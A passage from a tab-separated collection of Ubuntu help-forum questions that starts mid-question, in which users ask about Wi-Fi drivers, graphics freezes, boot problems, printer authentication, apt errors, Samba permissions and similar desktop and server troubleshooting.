iwlmvm : unknown symbol ieee80211_iterate_active_interfaces_atomic ( err -22 ) [ 7.880163 ] iwlmvm : disagrees about version of symbol rate_control_send_low [ 7.880165 ] iwlmvm : unknown symbol rate_control_send_low ( err -22 ) [ 7.880173 ] iwlmvm : disagrees about version of symbol ieee80211_unregister_hw [ 7.880175 ] iwlmvm : unknown symbol ieee80211_unregister_hw ( err -22 ) [ 7.880179 ] iwlmvm : disagrees about version of symbol ieee80211_resume_disconnect [ 7.880181 ] iwlmvm : unknown symbol ieee80211_resume_disconnect ( err -22 ) [ 7.880189 ] iwlmvm : disagrees about version of symbol ieee80211_beacon_get_tim [ 7.880191 ] iwlmvm : unknown symbol ieee80211_beacon_get_tim ( err -22 ) [ 7.880215 ] iwlmvm : disagrees about version of symbol cfg80211_chandef_create [ 7.880217 ] iwlmvm : unknown symbol cfg80211_chandef_create ( err -22 ) [ 7.880221 ] iwlmvm : disagrees about version of symbol ieee80211_request_smps [ 7.880223 ] iwlmvm : unknown symbol ieee80211_request_smps ( err -22 ) [ 7.880263 ] iwlmvm : disagrees about version of symbol ieee80211_disable_rssi_reports [ 7.880265 ] iwlmvm : unknown symbol ieee80211_disable_rssi_reports ( err -22 ) [ 7.880279 ] iwlmvm : disagrees about version of symbol mac80211_ieee80211_rx [ 7.880281 ] iwlmvm : unknown symbol mac80211_ieee80211_rx ( err -22 ) [ 7.880520 ] iwlwifi 0000:02:00.0 : failed to load module iwlmvm ( error 256 ) , is dynamic loading enabled ? content of /etc/network/devnames wlan0 : intel corporation device 08b1 content of /etc/network/interfaces auto lo iface lo inet loopback nm-tool networkmanager tool state : disconnected if anyone could help me with this that would be awesome . the laptop does n't have an ethernet port so i depend on the wireless working . edit : chili555 helped me get this working via chat . the issue was dell forces the laptop to use version 3.10 of the backports via dkms . we removed that from dkms then we installed 3.13 . note that every time a new kernel is installed 3.13 needs to be recompiled and reinstalled for the new kernel .
417438	does updating my graphics card change my initrd file ?	there is a back-story to me asking this question so please bear with me : i have been having graphics card issues for some time now on my macbook pro 10.1 . i dual booted using uefi boot and refind . every time i try to update my graphics drivers my computer would boot to a black screen . i would have left it alone but not being able to update the driver meant that my laptop could n't wake up from suspend properly . eventually i updated my kernel to 3.13 which changed my graphics driver to intel速 ivybridge mobile . this fixed the suspend issue but left me with some minor graphical artifacts that i could deal with having . when i went to print a file i accidentally hit super+p instead of ctrl-p and my display went black except for a square around my mouse . as i moved the mouse the square would `` reveal '' part of my screen . i rebooted and everything looked normal except instead of being in 1920x1200 resolution as i had previously set it , it was now in its native 2880x1800 mode . when i use xrandr to change the resolution it does the same black screen with `` revealing '' mouse thing that it did before . naturally i went back to trying to update the graphics driver but it resulted in the black screen on boot up that happened originally . part of the tutorial i used to dual boot ( found : here ) required me to put the initrd file for my kernel in a folder on the osx partition in the refind directory . now to my question . when i install a graphics driver there is always a line in the output that says update-initramfs : generating /boot/initrd.img-3.13.0-031300rc6-generic i assume this is changing my initrd file . why does this happen ? will i need to change the file on my osx partition to boot correctly ?
417440	trying to boot from a usb !	i was trying to boot ubuntu 13.10 from a usb pendrive , into a netbook with problems for booting from hardisk . but the screen displays the next : try ( hd0,0 ) : fat32 : no grldr try ( hd0,1 ) : invalid or null try ( hd0,2 ) : invalid or null try ( hd0,3 ) : invalid or null try ( hd1,0 ) : ntfs5 : no grldr try ( hd1,1 ) : ntfs5 : no grldr try ( hd1,2 ) : ntfs5 : no grldr try ( hd1,3 ) : extended : try ( hd1,4 ) : ext2 : _ and it does n't go on . can anybody tell me what 's going on ?
417441	xbindkeys scripts to toggle wifi and bluetooth devices on/off	i need scripts for toggling wifi and bluetooth ( 2 scripts ) on/off . i want to use them with xbindkeys . i searched the web , but failed to find it . i have found a script for wifi about a year ago , but i ca n't find it now , i guess it 's removed . $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : asus-wlan : wireless lan soft blocked : no hard blocked : no 3 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no
417443	pci hotplug does n't seem to work	in virsh i detach a pci bus from host and attach it to a vm . i do n't see any errors in these steps . but i do n't see the pci device listed in the vm . virsh # nodedev-dettach pci_0000_01_00_0 device pci_0000_01_00_0 dettached virsh # attach-device vm1 pci_add.xml device attached successfully $ cat pci_add.xml < hostdev mode='subsystem ' type='pci ' managed='yes ' > < source > < address domain='0x000 ' bus='0x01 ' slot='0x00 ' function='0x0'/ > < /source > < /hostdev > is pci hot plug not supported ? i am using ubuntu 12.04.3 ( kernel 3.8.0-34 ) . i can add the same pci device through virsh edit vm1 and start the vm1 . this way i am able to see the device .
417447	wordpress upload permission on nginx & ubuntu	i have a problem with permission on nginx/ubuntu vps . keep getting the error : “asr.jpg” has failed to upload due to an error unable to create directory uploads/2014/02 . is its parent directory writable by the server ? here are my uploads folder settings : drwxrwxr-x 8 www-data www-data 4096 feb 6 14:41 uploads any sugestions please ?
417452	where to enter authentication details for an ipp printer ?	i am trying to set up a network printer , which uses an ipp print queue . i added the printer using printing > add > find network printer > entered the ip address with queue = ipp > found correct driver > done now , this printer requires a username and a password to send jobs . on a mac , when i print a job using this printer , i have the following dialog i can not find the option to enter my authentication details anywhere in ubuntu , either using the printing application , or at the time i print a document through libre or viewer . at the moment , i send a job successfully , but it is being rejected by the printer ( i see this from the log messages ) . note that i do not own the printer and can not directly edit its settings , although i have a valid username and password to authenticate print jobs . any help on how i can add my credentials ?
417453	i failed to download respitory information	w : failed to fetch http : //dl.google.com/linux/deb/dists/stable/release unable to find expected entry 'non-free/binary-i386/packages ' in release file ( wrong sources.list entry or malformed file ) , e : some index files failed to download . they have been ignored , or old ones used instead . i have included a picture below showing my issues as i do n't know how to exactly explain it ... . should i be concerned and how do i fix it ? below is the contents of sources.list # deb cdrom : [ ubuntu 12.04.3 lts _precise pangolin_ - release i386 ( 20130820.1 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main # # depăâ´t multisystem deb http : //liveusb.info/multisystem/depot all main
417456	remaper keyboard	i want to make the following change on my keyboard ! using xev , got the keys to the keys you want to modify keycode 76 ( keysym 0xffc7 , f10 ) this is f10 â keycode 75 ( keysym 0xffc6 , f9 ) this is f9 key keycode 114 ( keysym 0xff53 , right ) right directional button keycode 113 ( keysym 0xff51 , left ) left directional button keycode 67 ( keysym 0xffbe , f1 ) intend to use to pause map to get : with f10 | trigger the right directional by pressing f9 | add the left directional with f1 | pause now for this to happen , how should the file . sh ?
417459	linux samba share on windows only writeable manually not throught netbeans application	i got a perfectly working samba share on my linux computer configured . i use it in windows as y : network drive . i can create folders , files what so ever . but when i use netbeans to create a phpdocumentor entry i get write permission errors . and the weirdest thing is that when that error appears phpdocumentor has already created a few folders and files on the network drive . i get the following errors from phpdocumentor : fatal error : smarty error : unable to write to $ compile_dir 'y : \classes\database\documentation\phpdoc\media\26d3399f63abd43a7d72f8c21440dcb0' i believe i had a similar problem before with another php documentor . i ca n't figure out why i can create folders and files without a problem when i do it manually , but when phpdocumentor tries it gives me write permission errors . anyone who could help me out ? the linux samba share is configured like this : [ share ] path = /var/www/domains/mydomain browsable = yes guest ok = no read list = roy valid users = roy write list = roy create mask = 0755 edit : it looks like phpdocumenter is trying to write as a different user or something . phpdocumentor works when i set the mask to 0777 , but i do n't want that as that would give me security risks .
417460	ubuntu 13.10 thinkpad edge e531 fan does n't stop once it starts running	i recently installed ubuntu 13.10 on my laptop and it works pretty well . however , i encountered a problem with my fan that i can not seem to fix . i tried installing and configuring lm-sensors , thinkfan and control fan , but none solved the issue . once i turn my computer on , the fan does n't run since ( perhaps ) the temperatures are still low , but once it gets more hot the fan starts running and it does n't stop ever . i would appreciate any help ! thanks .
417462	what do i do when extensive swap access makes system dead	memory is getting low and heavy swap access makes my system responding very slowly at first , but if i do n't react by freeing a lot of memory , the system becomes like almost completely dead . now i have this ridiculous situation where i ca n't even log in , while the system and programs are still running and constantly swapping gigabytes of memory back and forth . the graphical login does not even appear . after i pressed ctrl-alt-f1 and waited a couple of minutes , the text login appeared . but when i enter my login name , it says 60 seconds later , but before the password login prompt even appeared `` login timed out after 60 seconds '' . sometimes i get to the password prompt , but still it times out after 60 seconds . i am still trying right now , anyone has a better idea ? i ca n't even properly shut down like this . actually it would be enough to close some chromium tabs ( or kill their tasks ) , just how ? by the way , it is only one program and one website that causes alle this havoc : chromium and facebook . though facebook renders very fast in chromium , it uses a lot of memory â like a couple of hundred mb for each tab . and as those fb tabs are updated and each contains a chat window , scrolling updates etc . the memory usage constantly grows . this time i had around 20 tabs opened , many of them were fb tabs . system : amd64 3.5 gb ram , ubuntu 13.10 ( 64 bit ) swap is encrypted . i do n't know if not using disc encryption would make a difference .
417463	how do i use a virtual internet connection ?	can i login to my local computer , but use the internet connection of a remote server ? if so , how ? i have never done this before and am trying to experiment with ssh/tunneling protocols like socks and vpn.. i need laymen terms when being explained to about this because this is something i am fresh in using .
417464	can i use a timecapsule with backup utility ?	i 'm running ubuntu 13.1 . i have an apple time capsule on my network ( the latest model running firmware 7.7.9 ) . i can view it my browsing to it in the file system , however , when i right click on it and select open with files ( just to see what 'll happen ! ) i get the error unable to access location . what i want to know is , can i back up my ubuntu system to this timecapsule ( or a partition on this timecapsule or something ) using ubuntu 's backup utility ? is this non-trivial and should work forever ? or does apple not want people doing this ? i can connect to it via ethernet if needed . also , other , mac users will be using it also so i do n't want to render the device inoperable for them .
417466	arm ubuntu fails to get certain packages	i have arm ubuntu running under a chroot and everything seems to be set up and working well , however when i go to install certain packages i end up with failing to fetch errors , this does not happen for all . for example when i try to install xfce4 i get : failed to fetch http : //ports.ubuntu.com/pool/main/f/fuse/libfuse2_2.9.2-4ubuntu2_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/s/systemd/libsystemd-daemon0_204-0ubuntu15_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/a/apparmor/libapparmor1_2.8.0-0ubuntu30_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/s/systemd/libsystemd-login0_204-0ubuntu15_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/d/dbus/dbus_1.6.12-0ubuntu8_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/s/systemd/systemd-services_204-0ubuntu15_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/s/systemd/libpam-systemd_204-0ubuntu15_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/f/fuse/fuse_2.9.2-4ubuntu2_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/w/wayland/libwayland-client0_1.1.0-2ubuntu2_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/w/wayland/libwayland-cursor0_1.1.0-2ubuntu2_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/m/mesa/libgl1-mesa-dri_9.2.1-1ubuntu1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/w/wayland/libwayland-server0_1.1.0-2ubuntu2_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/m/mesa/libgbm1_9.2.1-1ubuntu1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/m/mesa/libegl1-mesa_9.2.1-1ubuntu1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/m/mesa/libopenvg1-mesa_9.2.1-1ubuntu1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/m/mesa/libegl1-mesa-drivers_9.2.1-1ubuntu1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/d/dbus/dbus-x11_1.6.12-0ubuntu8_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/g/gcc-4.8/libgomp1_4.8.1-10ubuntu7_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/g/gst-plugins-base1.0/libgstreamer-plugins-base1.0-0_1.2.0-1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/s/systemd/libgudev-1.0-0_204-0ubuntu15_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/u/upower/libupower-glib1_0.9.22-1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/g/gcc-4.8/cpp-4.8_4.8.1-10ubuntu7_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/g/gcc-defaults/cpp_4.8.1-2ubuntu2_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/d/desktop-file-utils/desktop-file-utils_0.21-1ubuntu1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/libh/libhybris/libandroid-properties1_0.1.0+git20130606+c5d897a-0ubuntu32_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/libh/libhybris/libhybris-common1_0.1.0+git20130606+c5d897a-0ubuntu32_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/libh/libhybris/libhardware2_0.1.0+git20130606+c5d897a-0ubuntu32_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/u/upower/upower_0.9.22-1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/x/x11-apps/x11-apps_7.7+1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/x/xorg-server/xserver-common_1.14.3-3ubuntu1_all.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/x/xorg-server/xserver-xorg-core_1.14.3-3ubuntu1_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/x/xorg/xserver-xorg-video-all_7.7+1ubuntu5_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/x/xorg/xserver-xorg-input-all_7.7+1ubuntu5_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/x/xorg/xserver-xorg_7.7+1ubuntu5_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] failed to fetch http : //ports.ubuntu.com/pool/main/x/xorg/xorg_7.7+1ubuntu5_armhf.deb 404 not found [ ip : 91.189.88.140 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? about 12mb of the packages fail
417467	alienware aurora ubuntu12.04 vnc connection refused	i have an issue with remote connecting to my computer through a vnc viewer . i have internet connection and i can connect through an ssh connection but i can not remote connect through a viewer . i 've tried everything in my knowledge repository to fix this issue . i 've uninstalled and reinstalled just about everything associated with connections ( my nvidia driver , the viewer itself , multitude of different viewers , reset my dns , disabled firewalls , changed appearances , uninstalled and reinstalled my x server . my last resort is to re-install the ubuntu os as remote connection to this computer is essential . any ideas/recommendations/guidance is appreciated .
417472	both 3m and elo touchscreen not working on arm based system running ubuntu 12.04 , looking for driver	i have a elo and a 3m touchscreen both connect through usb both no respond when connected to ubuntu 12.04 or 13.10. which i got from http : //www.armhf.com/index.php/download/ so my question is . is there a universal driver for touchscreen in ubuntu arm system ? i runned xinput list and xinput list-props and shows that it recognized the screen .
417474	nvidia 331 driver with ubuntu 13.10 - graphics crash	i hope this is not a duplicate and will not be seen as one . i have browsed all the answers and solutions on this forum plus everything i could find on google . my problem is that when i install nvidia 331 drivers ( ether from nvidia website or any other source ) after random amount of second ( not more then 2-3 minutes ) whole graphics freezes and there is no response from anything . ca n't even get into terminal . there is no crash report or log of any sort . it just hangs . i have tried so far : nvidia drivers xedgers drivers removing bumblebee using clean ubuntu install using ubuntu after apt-get upgrade using upgrade - > linux-headers-generic installed by nvidia script or from apt-get install nvidia ... every time drivers are installed with no errors , everything works for few seconds and then stops . if i switch to terminal ( any of text terminals ) graphics will not freeze until i 'll get back to unity . the only way to fix it is to purge everything that 's connected to nvidia and revert to nvidia-319 . any ideas where to start looking for source of problem or how to eliminate freezing of graphics ? my spec : ubuntu 13.10 compaq presario cq60-114em microprocessor - 2 ghz amd turion x2 dual-core mobile processor rm-70 memory - 4gb video graphics - nvidia geforce 8200m hard drive - 160 gb ( 5400 rpm ) display - 15.6 '' single channel lvds hd brightview ( 1366 x 768 )
417475	tvheadend on pi saying `` no input detected ''	this is my first time posting on here . i had a ubuntu 12.04.3lts server running tvheadend , with a rpi as the frontend . everything was working fine , i then went and brought myself a little dell poweredge 1950 . i have created a vm of the working server that was running tvheadend , added the usb to the config settings , it gets everything , all the mux 's are there , perfect signal and quality . so i go to set the pi up , reset all the dvb and pvr databases and its coming up with `` tvheadend htsp : no input detected '' . so after a while of looking around in the server , i came to the dmesg log , i have added just the end part ( everything from the start of the dvb config ) : [ 13.531334 ] dvb-usb : found a 'hauppauge nova-td stick ( 52009 ) ' in cold state , will try to load a firmware [ 13.548551 ] dvb-usb : downloading firmware from file 'dvb-usb-dib0700-1.20.fw' [ 13.821865 ] e1000 : eth0 nic link is up 1000 mbps full duplex , flow control : none [ 14.646128 ] init : failsafe main process ( 584 ) killed by term signal [ 15.130773 ] type=1400 audit ( 1391719987.659:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=753 comm= '' apparmor_parser '' [ 15.131423 ] type=1400 audit ( 1391719987.663:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=753 comm= '' apparmor_parser '' [ 15.131645 ] type=1400 audit ( 1391719987.663:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=753 comm= '' apparmor_parser '' [ 15.149650 ] type=1400 audit ( 1391719987.679:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=755 comm= '' apparmor_parser '' [ 18.490533 ] dib0700 : firmware started successfully . [ 18.993964 ] dvb-usb : found a 'hauppauge nova-td stick ( 52009 ) ' in warm state . [ 18.994473 ] dvb-usb : will pass the complete mpeg2 transport stream to the software demuxer . [ 18.995615 ] dvb : registering new adapter ( hauppauge nova-td stick ( 52009 ) ) [ 19.939357 ] usb 1-1 : dvb : registering adapter 0 frontend 0 ( dibcom 7000pc ) ... [ 20.524680 ] dib0070 : successfully identified [ 20.524690 ] dvb-usb : will pass the complete mpeg2 transport stream to the software demuxer . [ 20.527972 ] dvb : registering new adapter ( hauppauge nova-td stick ( 52009 ) ) [ 20.999385 ] usb 1-1 : dvb : registering adapter 1 frontend 0 ( dibcom 7000pc ) ... [ 21.589969 ] dib0070 : successfully identified [ 21.626593 ] registered ir keymap rc-dib0700-rc5 [ 21.627205 ] input : ir-receiver inside an usb dvb receiver as /devices/pci0000:00/0000:00:11.0/0000:02:03.0/usb1/1-1/rc/rc0/input5 [ 21.627360 ] rc0 : ir-receiver inside an usb dvb receiver as /devices/pci0000:00/0000:00:11.0/0000:02:03.0/usb1/1-1/rc/rc0 [ 21.627872 ] dvb-usb : schedule remote query interval to 50 msecs . [ 21.627880 ] dvb-usb : hauppauge nova-td stick ( 52009 ) successfully initialized and connected . [ 21.631543 ] usbcore : registered new interface driver dvb_usb_dib0700 [ 21.715817 ] init : udev-fallback-graphics main process ( 1029 ) terminated with status 1 [ 21.780130 ] init : plymouth-splash main process ( 1038 ) terminated with status 1 my initial guess would be it has something to do with the ir key-map , since i never got any of that on the server that i had running previously . but iâm completely lost with the last two logs , not sure what either of those are but whatever they are they have been terminated ... hope someone could shine some light onto this , thank you !
417476	ubuntu 13.10 workspace navigation	every so often , i have to reset my keyboard shortcuts for workspace navigation . usually when i shut my computer down and start it up again later . i 'm running 13.10 on an acer aspire one netbook .
417480	ati radeon x1300 driver install	i am trying to install the video driver for my ati radeon x1300 pro video card . i have followed many guides on how to do this from many places on the web . none of these guides seem to work ... i even try to install the drivers using the `` .run '' file downloaded from ati 's own driver download page . this too doesnt solve my problem ... i 'm a complete noob when it comes to linux but i would like to change that ! please could someone help ? ? system spec : intel pentium d 3.40ghz 4gb ddr2 ram 256mb ati x1300 pro pcie x16
417481	using dd with target smaller than source	some of you will laugh , but ... i made a mistake by resizing a virtualbox vdi to 50tb instead of 50gb . given that there 's no way in vbox to shrink it back ( even if the new space was untouched ) , i created a new vdi with the correct size of 50g and mounted them both in a ubuntu vm . now i think to dd from the `` 50tb '' source onto the 50gb target , hoping that dd will stop with error when the target ends , because it is obviously smaller . am i correct in my assumption , or dd will overwrite my smaller target cyclically ( which i do n't want ) ?
417482	home intranet webpage video link - new page opens but video wo n't play	i created the page in kompozer . just index.html . copied that file and the video file to the same folder in my home directory on the server ( headless ubuntu 12.04 ) over ssh . the page loads fine , the link is there and when i click on it a new page opens showing a video player . clicking play causes the play button to dim/grey but no video . i have tried both .mp4 and .avi files . both files can be saved through the link and play fine . i realize that i am doing the bare minimum , probably less than that , but can anyone get me on track for this ? i also realize i am trying to stream video here , is there a lot more to it than just linking to a file ? i am using my desktop ubuntu system and chromium to access the page and try to play video . update 2-7-14 - further research suggest two alternatives , ffserver ( part of ffmpeg ) and html5 code . starting and configuring ffserver did n't make any difference to how the page responded in the above configuration . html5 code embedded a video window but still failed to play . no response at all clicking play button and/or right click play in chromium . oh , i am also investigating vlc which certainly does do some streaming but have not seen any info applying it to headless and still relatively minimal install of ubuntu 12.04 . any input is highly appreciated in any possible direction . hopeful result is a local home server that will host and stream all audio and video stored locally via http . one thought is to use vlc but how to initiate code in webpage ? code below is example from vlc wiki pertaining to streaming via http . seems like having that code execute for each file link would be possible . not sure how much more there is too it though . any thoughts ? % vlc -vvv input_stream -- sout ' # standard { access=http , mux=ogg , dst=server.example.org:8080 } '
417486	ubuntu does n't work on my mac , what can i do ?	i need some help with a macbook . well , some months ago i have installed ubuntu and kali linux , on a hd external , and it works good on my macbook thanks to refit . today i have installed refit , in my sister 's macbook , doing the same things i did in mine . i have installed refit , and i plugged my external hd on her computer . when turned on the computer , i selected the penguin icon , and with all my surprise it did n't work . there was written no bootable disk . therefore i thought there was a problem with the partition of her computer , so on the main page of refit i selected partition tool i followed the instructions . when the program finished to repair partitions , i restarted the computer , and tried again to open linux . this time there was a different written no system disk . i ca n't understand why it happens only in her computer , because in mine it works well . also when i start the computer , on the main page of refit , next to apple icon , there is a square icon , black and grey where there is written boot legacy ox hd what does it means ? please i need some help . should i erase the whole computer 's hardisk , and install all things all over again ? ? ? or there is a easier way ? ? thanks : )
417487	if i create a partition , will it delete all of my files ?	i am running windows 8 on my ssd , and i also have a 2tb hdd . i want to install ubuntu on the hdd , but i have all of my programs and files on that drive , and am worried that i will lose them all if i create ubuntu partitions .
417489	ca n't get internet working in ubuntu 12.04 guest virtual box	i can not get internet working at my work place , may be because of proxy . at home internet works perfectly fine . virtual box is using nat for network connection . i had also tried changing the connection to bridged and did n't work either . i have seen a lot of posts on this and none of them have solved my issue . unless this one works i can not connect to cvs from eclipse . eth1 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : xxxx : :a00:27ff : fe4a : f961/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:372126 errors:3 dropped:0 overruns:0 frame:0 tx packets:173506 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:446759931 ( 446.7 mb ) tx bytes:10066402 ( 10.0 mb ) interrupt:10 base address:0xd020 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:710 errors:0 dropped:0 overruns:0 frame:0 tx packets:710 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:66411 ( 66.4 kb ) tx bytes:66411 ( 66.4 kb ) this is what i have in /etc/network/interfaces/ auto lo iface lo inet loopback i tried appending below settings , did n't work for me auto eth1 iface eth1 inet loopback can someone help me how to get this working . virtual box with windows 7 guest working perfectly fine , but not ubuntu . this problem is it fixed in later versions of ubuntu , so that i can update it or any suggestions on fixing this
417492	active sound hdmi asus n550jv ubuntu 13.10	sorry for my english . i have n550jv asus laptop . i connect laptop to tv for hdmi . the image see in tv , but it listen sound in tv . i install oem-audio-hda-daily-dkms and active sound-hmdi exists in sound-control , with hdmi5.1 and hdmi-stero options . i select whatever options , but no sound in tv . i see alximer , but no mute sound . aplay -l tarjeta 0 : mid [ hda intel mid ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 0 : mid [ hda intel mid ] , dispositivo 7 : hdmi 1 [ hdmi 1 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 0 : mid [ hda intel mid ] , dispositivo 8 : hdmi 2 [ hdmi 2 ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 tarjeta 1 : pch [ hda intel pch ] , dispositivo 0 : alc668 analog [ alc668 analog ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 the laptop uses two graphic cards , intel and nvidia , but i see it uses intel card for video and sound .
417494	can i create folders in ubuntu one cloud and upload data into them ?	okay . so i 've uploaded a file to ubuntu one . i have uploaded it from a folder on my pc . after uploading i realized that it would be better to have this uploaded file into a folder in the ubuntu one cloud . so can i create a new folder in ubuntu one after i uploaded the file and then transfer this file into my newly created folder in ubuntu one . this would be a really useful feature if possible . please provide any help i appreciate it . thanks .
417496	trying to install ( or just try ) ubunto , but i just get black screen immidiately after selecting `` install ubuntu '' in the first boot menu .	i am trying to boot from a usb drive prepaired with `` unetbootin '' but after selecting `` install ubuntu '' the usb keeps flashing ( indikator led ) for a few seconds and then it stops . and thene nothing . i have tried with linux mint 16 cinnamon and i get the exact same problem there.. i have tried following this guide ( http : //community.linuxmint.com/tutorial/view/842 ) but with no luck . when the black screen comes i can take no action other than killing it on the power bottom ( no `` crtl-alt-del '' , `` esc '' , `` random smashing on the keyboard '' is doing anything )
417499	kubuntu has two different user management programs in `` system settings ''	in system settings , i am seeing two different programs for user management . one of them is pretty highly effective , it 's the one on the left that says `` user management '' . a window pops up asking for my authentication and i get a fairly powerful tool for managing users : if i click on `` user manager '' , however , i get this dinky thing . is n't this unity 's user manager ? ? it ca n't really do much and i do n't know why it 's even there . how can i get rid of it ? ( and which is supposed to be the default one ? i assume it 's the former . )
